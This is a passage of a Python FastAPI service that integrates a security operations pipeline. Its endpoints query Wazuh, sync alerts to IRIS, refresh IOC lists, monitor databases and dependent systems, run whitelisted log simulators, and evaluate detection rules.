  1394. @app.get(
  1395. "/ioc/history",
  1396. response_model=ApiResponse,
  1397. summary="IOC trace history",
  1398. description="List recent IOC enrichment/evaluation trace records stored in database.",
  1399. )
  1400. async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse:
  1401. return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)})
  1402. @app.get(
  1403. "/geoip/{ip}",
  1404. response_model=ApiResponse,
  1405. summary="GeoIP lookup",
  1406. description="Lookup geolocation for a public IP address using configured GeoIP provider.",
  1407. )
  1408. async def geoip_lookup(ip: str) -> ApiResponse:
  1409. result = await geoip_adapter.lookup(ip)
  1410. return ApiResponse(data={"geoip": result})
  1411. @app.get(
  1412. "/sync/wazuh-version",
  1413. response_model=ApiResponse,
  1414. summary="Wazuh version",
  1415. description="Get Wazuh API/manager version information through adapter.",
  1416. )
  1417. async def sync_wazuh_version() -> ApiResponse:
  1418. try:
  1419. wazuh_result = await wazuh_adapter.get_version()
  1420. except Exception as exc:
  1421. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1422. return ApiResponse(data={"wazuh": wazuh_result})
  1423. @app.get(
  1424. "/wazuh/auth-test",
  1425. response_model=ApiResponse,
  1426. summary="Wazuh auth test",
  1427. description="Validate Wazuh API authentication using configured credentials.",
  1428. )
  1429. async def wazuh_auth_test() -> ApiResponse:
  1430. try:
  1431. result = await wazuh_adapter.auth_test()
  1432. except Exception as exc:
  1433. raise HTTPException(status_code=502, detail=f"Wazuh auth failed: {exc}") from exc
  1434. return ApiResponse(data={"wazuh": result})
  1435. @app.get(
  1436. "/wazuh/manager-info",
  1437. response_model=ApiResponse,
  1438. summary="Wazuh manager info",
  1439. description="Return manager information from Wazuh API.",
  1440. )
  1441. async def wazuh_manager_info() -> ApiResponse:
  1442. try:
  1443. result = await wazuh_adapter.get_manager_info()
  1444. except Exception as exc:
  1445. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1446. return ApiResponse(data={"wazuh": result})
  1447. @app.get(
  1448. "/wazuh/agents",
  1449. response_model=ApiResponse,
  1450. summary="List Wazuh agents",
  1451. description="List registered Wazuh agents with pagination and optional field selection.",
  1452. )
  1453. async def wazuh_agents(
  1454. limit: int = 50,
  1455. offset: int = 0,
  1456. select: str | None = None,
  1457. ) -> ApiResponse:
  1458. try:
  1459. result = await wazuh_adapter.list_agents(limit=limit, offset=offset, select=select)
  1460. except Exception as exc:
  1461. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1462. return ApiResponse(data={"wazuh": result})
  1463. @app.get(
  1464. "/wazuh/alerts",
  1465. response_model=ApiResponse,
  1466. summary="List Wazuh alerts",
  1467. description="List alert-like entries from manager logs API for current Wazuh build.",
  1468. )
  1469. async def wazuh_alerts(
  1470. limit: int = 50,
  1471. offset: int = 0,
  1472. q: str | None = None,
  1473. sort: str | None = None,
  1474. ) -> ApiResponse:
  1475. try:
  1476. # In this Wazuh build, API alerts are exposed via manager logs.
  1477. result = await wazuh_adapter.list_manager_logs(
  1478. limit=limit, offset=offset, q=q, sort=sort
  1479. )
  1480. except Exception as exc:
  1481. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1482. return ApiResponse(data={"wazuh": result})
  1483. @app.get(
  1484. "/wazuh/manager-logs",
  1485. response_model=ApiResponse,
  1486. summary="List Wazuh manager logs",
  1487. description="Query manager logs endpoint with pagination and optional q/sort filters.",
  1488. )
  1489. async def wazuh_manager_logs(
  1490. limit: int = 50,
  1491. offset: int = 0,
  1492. q: str | None = None,
  1493. sort: str | None = None,
  1494. ) -> ApiResponse:
  1495. try:
  1496. result = await wazuh_adapter.list_manager_logs(
  1497. limit=limit, offset=offset, q=q, sort=sort
  1498. )
  1499. except Exception as exc:
  1500. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1501. return ApiResponse(data={"wazuh": result})
  1502. @app.post(
  1503. "/wazuh/sync-to-mvp",
  1504. response_model=ApiResponse,
  1505. dependencies=[Depends(require_internal_api_key)],
  1506. summary="Sync Wazuh to MVP",
  1507. description="Fetch Wazuh alerts from indexer and create IRIS Alerts for each. Returns iris_alert_ids of created alerts.",
  1508. )
  1509. async def wazuh_sync_to_mvp(
  1510. limit: int = 50,
  1511. minutes: int = 120,
  1512. q: str = "soc_mvp_test=true OR event_type:*",
  1513. min_severity: str | None = None,
  1514. ) -> ApiResponse:
  1515. try:
  1516. result = await mvp_service.sync_wazuh_alerts(
  1517. query=q, limit=limit, minutes=minutes, min_severity=min_severity
  1518. )
  1519. except Exception as exc:
  1520. raise HTTPException(status_code=502, detail=f"Wazuh sync failed: {exc}") from exc
  1521. return ApiResponse(data={"sync": result})
  1522. @app.get(
  1523. "/wazuh/auto-sync/status",
  1524. response_model=ApiResponse,
  1525. summary="Wazuh auto-sync status",
  1526. description="Show auto-sync enablement, settings, task runtime state, and last sync result (iris_alert_ids of created IRIS Alerts).",
  1527. )
  1528. async def wazuh_auto_sync_status() -> ApiResponse:
  1529. state = getattr(app.state, "wazuh_auto_sync_state", {})
  1530. task = getattr(app.state, "wazuh_auto_sync_task", None)
  1531. policy = mvp_service.repo.get_policy()
  1532. return ApiResponse(
  1533. data={
  1534. "enabled": settings.wazuh_auto_sync_enabled,
  1535. "task_running": bool(task and not task.done()),
  1536. "settings": {
  1537. "interval_seconds": settings.wazuh_auto_sync_interval_seconds,
  1538. "limit": settings.wazuh_auto_sync_limit,
  1539. "minutes": settings.wazuh_auto_sync_minutes,
  1540. "query": settings.wazuh_auto_sync_query,
  1541. "min_severity": policy.get("sync", {}).get("min_severity", "medium"),
  1542. },
  1543. "state": state,
  1544. }
  1545. )
  1546. @app.post(
  1547. "/wazuh/ioc-lists/refresh",
  1548. response_model=ApiResponse,
  1549. dependencies=[Depends(require_internal_api_key)],
  1550. summary="Trigger IOC list refresh",
  1551. description="Fetch public IOC feeds and local confirmed hits, write CDB list files, and restart Wazuh analysisd.",
  1552. )
  1553. async def ioc_lists_refresh() -> ApiResponse:
  1554. state = getattr(app.state, "ioc_refresh_state", {})
  1555. state["running"] = True
  1556. state["last_started_at"] = datetime.now(timezone.utc).isoformat()
  1557. try:
  1558. result = await ioc_list_service.refresh()
  1559. state["last_status"] = "ok"
  1560. state["last_result"] = result
  1561. state["last_error"] = None
  1562. state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  1563. return ApiResponse(data=result)
  1564. except Exception as exc:
  1565. state["last_status"] = "error"
  1566. state["last_error"] = str(exc)
  1567. state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  1568. raise HTTPException(status_code=500, detail=str(exc)) from exc
  1569. finally:
  1570. state["running"] = False
  1571. @app.get(
  1572. "/wazuh/ioc-lists/status",
  1573. response_model=ApiResponse,
  1574. summary="IOC list status",
  1575. description="Return the last refresh result and current entry counts for each CDB list file.",
  1576. )
  1577. async def ioc_lists_status() -> ApiResponse:
  1578. state = getattr(app.state, "ioc_refresh_state", {})
  1579. task = getattr(app.state, "ioc_refresh_task", None)
  1580. disk_status = ioc_list_service.list_status()
  1581. return ApiResponse(
  1582. data={
  1583. "enabled": settings.ioc_refresh_enabled,
  1584. "task_running": bool(task and not task.done()),
  1585. "settings": {
  1586. "interval_seconds": settings.ioc_refresh_interval_seconds,
  1587. "confidence_threshold": settings.ioc_refresh_confidence_threshold,
  1588. "lookback_days": settings.ioc_refresh_lookback_days,
  1589. "lists_path": settings.wazuh_lists_path,
  1590. },
  1591. "disk": disk_status,
  1592. "state": state,
  1593. }
  1594. )
  1595. @app.get(
  1596. "/wazuh/sync-policy",
  1597. response_model=ApiResponse,
  1598. summary="Get Wazuh sync policy",
  1599. description="Return the current sync policy (min_severity threshold for IRIS alert creation).",
  1600. )
  1601. async def get_sync_policy() -> ApiResponse:
  1602. policy = mvp_service.repo.get_policy()
  1603. return ApiResponse(data={"sync": policy.get("sync", {"min_severity": "medium"})})
  1604. @app.put(
  1605. "/wazuh/sync-policy",
  1606. response_model=ApiResponse,
  1607. dependencies=[Depends(require_internal_api_key)],
  1608. summary="Update Wazuh sync policy",
  1609. description="Set the minimum severity level for forwarding Wazuh alerts to IRIS. Persists immediately; auto-sync picks it up on the next cycle.",
  1610. )
  1611. async def put_sync_policy(body: SyncPolicyRequest) -> ApiResponse:
  1612. policy = mvp_service.repo.get_policy()
  1613. policy.setdefault("sync", {})["min_severity"] = body.min_severity
  1614. mvp_service.repo.update_policy(policy)
  1615. return ApiResponse(data={"sync": policy["sync"]})
@app.get(
    "/monitor/db/tables",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="List database tables",
    description="List soc-integrator PostgreSQL tables with row count and relation size.",
)
async def monitor_db_tables() -> ApiResponse:
    """List public-schema tables with exact row counts and relation sizes.

    Combines pg_tables/pg_stat_user_tables metadata (estimated rows, total
    relation size) with an exact ``COUNT(*)`` per table. The per-table count
    can be slow on very large tables.

    NOTE(review): ``item.get(...)`` / ``count_row.get(...)`` assume the cursor
    returns dict-like rows (e.g. psycopg dict_row factory) — confirm against
    ``get_conn`` configuration.
    """
    rows: list[dict[str, object]] = []
    with get_conn() as conn, conn.cursor() as cur:
        # Metadata pass: estimated rows and on-disk size for every public table.
        cur.execute(
            """
            SELECT
                t.schemaname,
                t.tablename,
                COALESCE(s.n_live_tup, 0)::BIGINT AS estimated_rows,
                COALESCE(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename)), 0)::BIGINT AS size_bytes,
                COALESCE(pg_size_pretty(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename))), '0 bytes') AS size_pretty
            FROM pg_tables t
            LEFT JOIN pg_stat_user_tables s
                ON s.schemaname = t.schemaname
                AND s.relname = t.tablename
            WHERE t.schemaname = 'public'
            ORDER BY t.tablename
            """
        )
        tables = cur.fetchall()
        for item in tables:
            schema = str(item.get("schemaname") or "public")
            table = str(item.get("tablename") or "")
            if not table:
                continue
            # Exact row count; identifiers are quoted via sql.Identifier to
            # stay safe even though the names come from pg_tables itself.
            cur.execute(
                sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
                    sql.Identifier(schema),
                    sql.Identifier(table),
                )
            )
            count_row = cur.fetchone() or {}
            row_count = int(count_row.get("cnt", 0) or 0)
            rows.append(
                {
                    "schema": schema,
                    "table": table,
                    "row_count": row_count,
                    "estimated_rows": int(item.get("estimated_rows", 0) or 0),
                    "size_bytes": int(item.get("size_bytes", 0) or 0),
                    "size_pretty": str(item.get("size_pretty") or "0 bytes"),
                }
            )
    return ApiResponse(
        data={
            "database": settings.soc_integrator_db_name,
            "generated_at": datetime.now(timezone.utc).isoformat(),
            "tables": rows,
        }
    )
@app.get(
    "/monitor/db/tables/{table_name}/rows",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="List rows from selected table",
    description="Return rows from a selected public table with pagination.",
)
async def monitor_db_table_rows(
    table_name: str,
    limit: int = 50,
    offset: int = 0,
) -> ApiResponse:
    """Return a page of rows from one public-schema table.

    The table name is validated against pg_tables before any dynamic SQL is
    built, and identifiers are quoted with ``sql.Identifier`` — user input
    never reaches the query as raw text.

    Raises:
        HTTPException 400: empty table name.
        HTTPException 404: table does not exist in schema ``public``.
    """
    table = str(table_name or "").strip()
    if not table:
        raise HTTPException(status_code=400, detail="table_name is required")
    # Clamp pagination: 1..500 rows per page, non-negative offset.
    page_limit = max(1, min(int(limit), 500))
    page_offset = max(0, int(offset))
    with get_conn() as conn, conn.cursor() as cur:
        # Existence check guards the dynamic identifier below.
        cur.execute(
            """
            SELECT 1
            FROM pg_tables
            WHERE schemaname = 'public' AND tablename = %s
            LIMIT 1
            """,
            (table,),
        )
        if not cur.fetchone():
            raise HTTPException(status_code=404, detail=f"table '{table}' not found in schema public")
        cur.execute(
            sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
                sql.Identifier("public"),
                sql.Identifier(table),
            )
        )
        total_row = cur.fetchone() or {}
        total = int(total_row.get("cnt", 0) or 0)
        # ORDER BY 1 DESC: newest-first by the first column (typically a serial id).
        cur.execute(
            sql.SQL("SELECT * FROM {}.{} ORDER BY 1 DESC LIMIT %s OFFSET %s").format(
                sql.Identifier("public"),
                sql.Identifier(table),
            ),
            (page_limit, page_offset),
        )
        rows = [dict(item) for item in (cur.fetchall() or [])]
    return ApiResponse(
        data={
            "table": table,
            "limit": page_limit,
            "offset": page_offset,
            "total": total,
            "rows": rows,
        }
    )
@app.get(
    "/monitor/systems",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="Systems monitor overview",
    description="Unified monitoring snapshot for Wazuh, Shuffle, IRIS, and PagerDuty with pipeline KPIs and recent records.",
)
async def monitor_systems(
    minutes: int = 60,
    limit: int = 20,
    include_raw: bool = False,
) -> ApiResponse:
    """Build a unified health/KPI snapshot for Wazuh, Shuffle, IRIS, and PagerDuty.

    For each system a "card" is produced with status (ok / degraded / down),
    latency, last-OK timestamp, recent records, and KPIs computed from
    persisted database rows in the lookback window. Per-system fetch errors
    are captured rather than failing the whole endpoint: a reachable
    dependency with a failed recent-records fetch is reported as "degraded".

    Args:
        minutes: lookback window for KPI counters (clamped to >= 1).
        limit: max recent records per card (clamped to >= 1).
        include_raw: attach raw dependency-health details to each card.
    """
    window_minutes = max(1, minutes)
    row_limit = max(1, limit)
    now = datetime.now(timezone.utc)
    since = now - timedelta(minutes=window_minutes)
    now_iso = now.isoformat()
    dependencies = await mvp_service.dependency_health()
    # last_ok_at timestamps survive across requests via app.state.
    monitor_state = getattr(app.state, "systems_monitor_state", {"last_ok_at": {}})
    last_ok_at_by_key = monitor_state.setdefault("last_ok_at", {})
    # KPI counters from persisted database records in the selected lookback window.
    alerts_ingested = repo.count_incident_events_since(since=since, source="wazuh")
    detections_matched = repo.count_c_detection_events_since(since=since)
    iris_tickets_created = repo.count_incidents_with_iris_since(since=since)
    pagerduty_escalations_sent = repo.count_escalations_since(since=since, success=True)
    pagerduty_escalations_failed = repo.count_escalations_since(since=since, success=False)
    # Recent records per system; failures are recorded, not raised.
    wazuh_recent: list[object] = []
    wazuh_recent_error: str | None = None
    try:
        wazuh_resp = await wazuh_adapter.list_manager_logs(limit=row_limit, offset=0, q=None, sort=None)
        wazuh_recent = _extract_first_array(wazuh_resp)[:row_limit]
    except Exception as exc:
        wazuh_recent_error = str(exc)
    shuffle_recent: list[object] = []
    shuffle_recent_error: str | None = None
    try:
        workflows_resp = await shuffle_adapter.list_workflows()
        workflows = _extract_first_array(workflows_resp)
        for item in workflows[:row_limit]:
            if isinstance(item, dict):
                # Normalize to a small summary; field names vary across
                # Shuffle API versions (id vs workflow_id, nested name).
                shuffle_recent.append(
                    {
                        "id": item.get("id") or item.get("workflow_id"),
                        "name": item.get("name") or item.get("workflow", {}).get("name"),
                        "status": item.get("status"),
                    }
                )
            else:
                shuffle_recent.append(item)
    except Exception as exc:
        shuffle_recent_error = str(exc)
    iris_recent: list[object] = []
    iris_recent_error: str | None = None
    try:
        iris_resp = await iris_adapter.list_cases(limit=row_limit, offset=0)
        iris_recent = _extract_first_array(iris_resp)[:row_limit]
    except Exception as exc:
        iris_recent_error = str(exc)
    pagerduty_recent = repo.list_recent_escalations(limit=row_limit)
    def build_card(
        label: str,
        dependency_key: str,
        recent: list[object],
        kpis: dict[str, object],
        extra_error: str | None = None,
    ) -> dict[str, object]:
        # Assemble one system card from dependency health + recent data.
        # "degraded" = dependency is up but the recent-records fetch failed.
        dep = dependencies.get(dependency_key, {})
        dep_status = str(dep.get("status") or "down")
        status = "ok" if dep_status == "up" else "down"
        if dep_status == "up":
            last_ok_at_by_key[label] = now_iso
        error_parts: list[str] = []
        if dep.get("error"):
            error_parts.append(str(dep.get("error")))
        if extra_error:
            error_parts.append(extra_error)
        if dep_status == "up" and extra_error:
            status = "degraded"
        card: dict[str, object] = {
            "status": status,
            "latency_ms": dep.get("latency_ms"),
            "last_ok_at": last_ok_at_by_key.get(label),
            "last_error": " | ".join(error_parts) if error_parts else None,
            "kpis": kpis,
            "recent": recent,
        }
        if include_raw:
            card["raw"] = dep.get("details")
        return card
    cards = {
        "wazuh": build_card(
            label="wazuh",
            dependency_key="wazuh",
            recent=wazuh_recent,
            extra_error=wazuh_recent_error,
            kpis={
                "alerts_ingested": alerts_ingested,
                "recent_rows": len(wazuh_recent),
            },
        ),
        "shuffle": build_card(
            label="shuffle",
            dependency_key="shuffle",
            recent=shuffle_recent,
            extra_error=shuffle_recent_error,
            kpis={
                "recent_workflows": len(shuffle_recent),
            },
        ),
        "iris": build_card(
            label="iris",
            dependency_key="iris",
            recent=iris_recent,
            extra_error=iris_recent_error,
            kpis={
                "tickets_created": iris_tickets_created,
                "recent_rows": len(iris_recent),
            },
        ),
        "pagerduty": build_card(
            label="pagerduty",
            dependency_key="pagerduty_stub",
            recent=pagerduty_recent,
            kpis={
                "escalations_sent": pagerduty_escalations_sent,
                "escalations_failed": pagerduty_escalations_failed,
            },
        ),
    }
    # Persist updated last_ok_at bookkeeping for the next request.
    app.state.systems_monitor_state = monitor_state
    return ApiResponse(
        data={
            "generated_at": now_iso,
            "window_minutes": window_minutes,
            "cards": cards,
            "pipeline": {
                "alerts_ingested": alerts_ingested,
                "detections_matched": detections_matched,
                "iris_tickets_created": iris_tickets_created,
                "pagerduty_escalations_sent": pagerduty_escalations_sent,
                "pagerduty_escalations_failed": pagerduty_escalations_failed,
            },
        }
    )
  1871. @app.get(
  1872. "/sim/logs/runs",
  1873. response_model=ApiResponse,
  1874. dependencies=[Depends(require_internal_api_key)],
  1875. summary="List simulator runs",
  1876. description="List active and recent simulator script runs started from soc-integrator.",
  1877. )
  1878. async def sim_logs_runs() -> ApiResponse:
  1879. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1880. items: list[dict[str, object]] = []
  1881. for run_id, run in sim_runs.items():
  1882. serialized = _serialize_sim_run(run_id, run)
  1883. if (not serialized["running"]) and not run.get("stopped_at"):
  1884. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1885. serialized["stopped_at"] = run["stopped_at"]
  1886. items.append(serialized)
  1887. items.sort(key=lambda x: str(x.get("started_at") or ""), reverse=True)
  1888. return ApiResponse(data={"items": items})
  1889. @app.post(
  1890. "/sim/logs/start",
  1891. response_model=ApiResponse,
  1892. dependencies=[Depends(require_internal_api_key)],
  1893. summary="Start simulator logs script",
  1894. description="Start a whitelisted simulator script in background and return run metadata.",
  1895. )
  1896. async def sim_logs_start(payload: SimLogRunRequest) -> ApiResponse:
  1897. script_name = SIM_SCRIPT_MAP[payload.script]
  1898. script_path = SIM_SCRIPTS_DIR / script_name
  1899. if not script_path.exists():
  1900. raise HTTPException(status_code=400, detail=f"Simulator script not found in container: {script_name}")
  1901. cmd = _build_sim_command(payload)
  1902. env = dict(os.environ)
  1903. env.setdefault("WAZUH_SYSLOG_HOST", "wazuh.manager")
  1904. env.setdefault("WAZUH_SYSLOG_PORT", "514")
  1905. run_id = str(uuid.uuid4())
  1906. log_file = SIM_RUN_LOGS_DIR / f"{run_id}.log"
  1907. log_handle = None
  1908. try:
  1909. log_handle = log_file.open("ab")
  1910. process = subprocess.Popen(
  1911. cmd,
  1912. cwd=str(SIM_SCRIPTS_DIR),
  1913. env=env,
  1914. stdout=log_handle,
  1915. stderr=subprocess.STDOUT,
  1916. start_new_session=True,
  1917. )
  1918. except Exception as exc:
  1919. if log_handle:
  1920. try:
  1921. log_handle.close()
  1922. except Exception:
  1923. pass
  1924. raise HTTPException(status_code=502, detail=f"Failed to start simulator: {exc}") from exc
  1925. finally:
  1926. if log_handle:
  1927. log_handle.close()
  1928. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1929. sim_runs[run_id] = {
  1930. "script": payload.script,
  1931. "target": payload.target,
  1932. "scenario": payload.scenario,
  1933. "count": payload.count,
  1934. "delay_seconds": payload.delay_seconds,
  1935. "forever": payload.forever,
  1936. "pid": process.pid,
  1937. "cmd": " ".join(shlex.quote(part) for part in cmd),
  1938. "started_at": datetime.now(timezone.utc).isoformat(),
  1939. "stopped_at": None,
  1940. "return_code": None,
  1941. "log_file": str(log_file),
  1942. "process": process,
  1943. }
  1944. app.state.sim_runs = sim_runs
  1945. return ApiResponse(data={"run": _serialize_sim_run(run_id, sim_runs[run_id])})
  1946. @app.post(
  1947. "/sim/logs/stop/{run_id}",
  1948. response_model=ApiResponse,
  1949. dependencies=[Depends(require_internal_api_key)],
  1950. summary="Stop simulator run",
  1951. description="Stop a running simulator script by run_id.",
  1952. )
  1953. async def sim_logs_stop(run_id: str) -> ApiResponse:
  1954. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1955. run = sim_runs.get(run_id)
  1956. if not run:
  1957. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1958. process = run.get("process")
  1959. if process and process.poll() is None:
  1960. try:
  1961. process.terminate()
  1962. process.wait(timeout=3)
  1963. except subprocess.TimeoutExpired:
  1964. process.kill()
  1965. except Exception as exc:
  1966. raise HTTPException(status_code=502, detail=f"Failed to stop run: {exc}") from exc
  1967. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1968. return ApiResponse(data={"run": _serialize_sim_run(run_id, run)})
  1969. @app.post(
  1970. "/sim/logs/stop-running",
  1971. response_model=ApiResponse,
  1972. dependencies=[Depends(require_internal_api_key)],
  1973. summary="Stop all running simulator runs",
  1974. description="Stop all currently running simulator scripts (including forever mode).",
  1975. )
  1976. async def sim_logs_stop_running() -> ApiResponse:
  1977. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1978. stopped: list[dict[str, object]] = []
  1979. already_stopped = 0
  1980. for run_id, run in sim_runs.items():
  1981. process = run.get("process")
  1982. if process and process.poll() is None:
  1983. try:
  1984. process.terminate()
  1985. process.wait(timeout=3)
  1986. except subprocess.TimeoutExpired:
  1987. process.kill()
  1988. except Exception as exc:
  1989. raise HTTPException(status_code=502, detail=f"Failed to stop run {run_id}: {exc}") from exc
  1990. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1991. stopped.append(_serialize_sim_run(run_id, run))
  1992. else:
  1993. already_stopped += 1
  1994. return ApiResponse(
  1995. data={
  1996. "stopped_count": len(stopped),
  1997. "already_stopped_count": already_stopped,
  1998. "runs": stopped,
  1999. }
  2000. )
  2001. @app.get(
  2002. "/sim/logs/output/{run_id}",
  2003. response_model=ApiResponse,
  2004. dependencies=[Depends(require_internal_api_key)],
  2005. summary="Get simulator run output",
  2006. description="Return tailed output lines from simulator run log file.",
  2007. )
  2008. async def sim_logs_output(run_id: str, limit: int = 200) -> ApiResponse:
  2009. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  2010. run = sim_runs.get(run_id)
  2011. if not run:
  2012. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  2013. log_file_path = run.get("log_file")
  2014. if not log_file_path:
  2015. raise HTTPException(status_code=404, detail=f"No log file for run: {run_id}")
  2016. log_file = Path(str(log_file_path))
  2017. lines = _tail_log_lines(log_file, limit=limit)
  2018. process = run.get("process")
  2019. running = bool(process and process.poll() is None)
  2020. return ApiResponse(
  2021. data={
  2022. "run_id": run_id,
  2023. "running": running,
  2024. "line_count": len(lines),
  2025. "lines": lines,
  2026. "text": "\n".join(lines),
  2027. "log_file": str(log_file),
  2028. }
  2029. )
  2030. @app.get(
  2031. "/sim/logs/wazuh-latest/{run_id}",
  2032. response_model=ApiResponse,
  2033. dependencies=[Depends(require_internal_api_key)],
  2034. summary="Get latest Wazuh logs/rules for simulator run",
  2035. description="Return latest Wazuh event logs and matched rules correlated to a simulator run.",
  2036. )
  2037. async def sim_logs_wazuh_latest(
  2038. run_id: str,
  2039. limit: int = 50,
  2040. minutes: int = 15,
  2041. include_raw: bool = False,
  2042. ) -> ApiResponse:
  2043. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  2044. run = sim_runs.get(run_id)
  2045. if not run:
  2046. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  2047. requested_minutes = max(1, int(minutes))
  2048. # Keep query unfiltered and use a wide lookback to emulate Discover "latest records".
  2049. effective_minutes = max(1440, requested_minutes)
  2050. query_limit = max(1, min(int(limit), 200))
  2051. query_text = "*"
  2052. try:
  2053. raw = await wazuh_adapter.search_alerts(
  2054. query=query_text,
  2055. limit=query_limit,
  2056. minutes=effective_minutes,
  2057. )
  2058. except Exception as exc:
  2059. raise HTTPException(status_code=502, detail=f"Wazuh search failed: {exc}") from exc
  2060. hits = _extract_wazuh_hits(raw)
  2061. events = [_extract_wazuh_event_item(hit, include_raw=include_raw) for hit in hits]
  2062. rules: list[dict[str, object]] = []
  2063. for hit in hits:
  2064. rule_item = _extract_wazuh_rule_item(hit, include_raw=include_raw)
  2065. if rule_item:
  2066. rules.append(rule_item)
  2067. return ApiResponse(
  2068. data={
  2069. "run": _serialize_sim_run(run_id, run),
  2070. "query": {
  2071. "effective_minutes": effective_minutes,
  2072. "text": query_text,
  2073. "limit": query_limit,
  2074. },
  2075. "events": events,
  2076. "rules": rules,
  2077. "totals": {
  2078. "events": len(events),
  2079. "rules": len(rules),
  2080. },
  2081. }
  2082. )
  2083. @app.post(
  2084. "/monitor/log-loss/check",
  2085. response_model=ApiResponse,
  2086. dependencies=[Depends(require_internal_api_key)],
  2087. summary="Check log loss",
  2088. description="Check expected telemetry streams for missing logs in a configurable lookback window.",
  2089. )
  2090. async def monitor_log_loss_check(
  2091. payload: LogLossCheckRequest | None = None,
  2092. create_ticket: bool = False,
  2093. ) -> ApiResponse:
  2094. req = payload or LogLossCheckRequest()
  2095. result = await _execute_log_loss_check(req=req, create_ticket=create_ticket)
  2096. return ApiResponse(data=result)
@app.post(
    "/monitor/c-detections/evaluate",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="Evaluate Appendix C detections",
    description="Evaluate C1-C3 detection rules on recent events, optionally creating incidents/tickets.",
)
async def monitor_c_detections_evaluate(payload: CDetectionEvaluateRequest) -> ApiResponse:
    """Run the Appendix C (C1-C3) detection rules over recent Wazuh alerts.

    Flow: fetch raw alerts -> normalize -> evaluate rules -> persist every
    match, then optionally open an IRIS incident per match (honoring
    ``payload.dry_run``, the create-ticket setting, and a per-(usecase,
    entity) cooldown). Runtime status is mirrored into
    ``app.state.c_detection_state`` for the /monitor/c-detections/state
    endpoint.

    Raises:
        HTTPException: 400 when C detection is disabled by configuration;
            502 when any downstream step (search, evaluate, persist,
            ingest) fails.
    """
    if not settings.c_detection_enabled:
        raise HTTPException(status_code=400, detail="C detection is disabled by configuration")
    started_at = datetime.now(timezone.utc).isoformat()
    app.state.c_detection_state["last_started_at"] = started_at
    try:
        raw = await wazuh_adapter.search_alerts(
            query=payload.query,
            limit=max(1, payload.limit),
            minutes=max(1, payload.minutes),
        )
        # Elasticsearch-style envelope: documents live under hits.hits.
        hits = (raw.get("hits", {}) or {}).get("hits", []) if isinstance(raw, dict) else []
        normalized = [mvp_service.normalize_wazuh_hit(hit) for hit in hits]
        evaluated = await c_detection_service.evaluate(normalized, selectors=payload.selectors)
        records: list[dict[str, object]] = []
        for match in evaluated.get("matches", []):
            usecase_id = str(match.get("usecase_id") or "")
            entity = str(match.get("entity") or "unknown")
            severity = str(match.get("severity") or "medium")
            evidence = dict(match.get("evidence") or {})
            event_ref = {
                "event_id": ((match.get("event") or {}).get("event_id")),
                "timestamp": ((match.get("event") or {}).get("timestamp")),
                "source": ((match.get("event") or {}).get("source")),
            }
            # Cooldown only suppresses ticket creation for a repeated
            # (usecase, entity) pair; the match itself is still persisted.
            in_cooldown = repo.is_c_detection_in_cooldown(
                usecase_id=usecase_id,
                entity=entity,
                cooldown_seconds=int(settings.c_detection_ticket_cooldown_seconds),
            )
            incident_key: str | None = None
            event_row = repo.add_c_detection_event(
                usecase_id=usecase_id,
                entity=entity,
                severity=severity,
                evidence=evidence,
                event_ref=event_ref,
                incident_key=None,
            )
            if (not payload.dry_run) and settings.c_detection_create_iris_ticket and not in_cooldown:
                incident_event = _c_match_to_incident_event(match)
                ingest = await mvp_service.ingest_incident(incident_event)
                # Normalize missing/empty incident keys to None so the stored
                # column stays unset rather than an empty string.
                incident_key = str(ingest.get("incident_key") or "") or None
                repo.update_c_detection_incident(int(event_row["id"]), incident_key)
            records.append(
                {
                    "id": event_row["id"],
                    "usecase_id": usecase_id,
                    "entity": entity,
                    "severity": severity,
                    "incident_key": incident_key,
                    "cooldown_active": in_cooldown,
                    "evidence": evidence,
                }
            )
        result = {
            "query": payload.query,
            "minutes": max(1, payload.minutes),
            "selectors": payload.selectors,
            "dry_run": payload.dry_run,
            "summary": evaluated.get("summary", {}),
            "matches": records,
            "total_hits": len(hits),
        }
        app.state.c_detection_state["last_status"] = "ok"
        app.state.c_detection_state["last_result"] = result
        app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
        return ApiResponse(data=result)
    except Exception as exc:
        # Record the failure in runtime state before surfacing a 502 so the
        # /state endpoint reflects the last error.
        app.state.c_detection_state["last_status"] = "error"
        app.state.c_detection_state["last_error"] = str(exc)
        app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
        raise HTTPException(status_code=502, detail=f"C detection evaluation failed: {exc}") from exc
  2177. @app.get(
  2178. "/monitor/c-detections/history",
  2179. response_model=ApiResponse,
  2180. dependencies=[Depends(require_internal_api_key)],
  2181. summary="C detection history",
  2182. description="List persisted C1-C3 detection matches, including evidence and linked incident keys.",
  2183. )
  2184. async def monitor_c_detections_history(
  2185. limit: int = 50,
  2186. offset: int = 0,
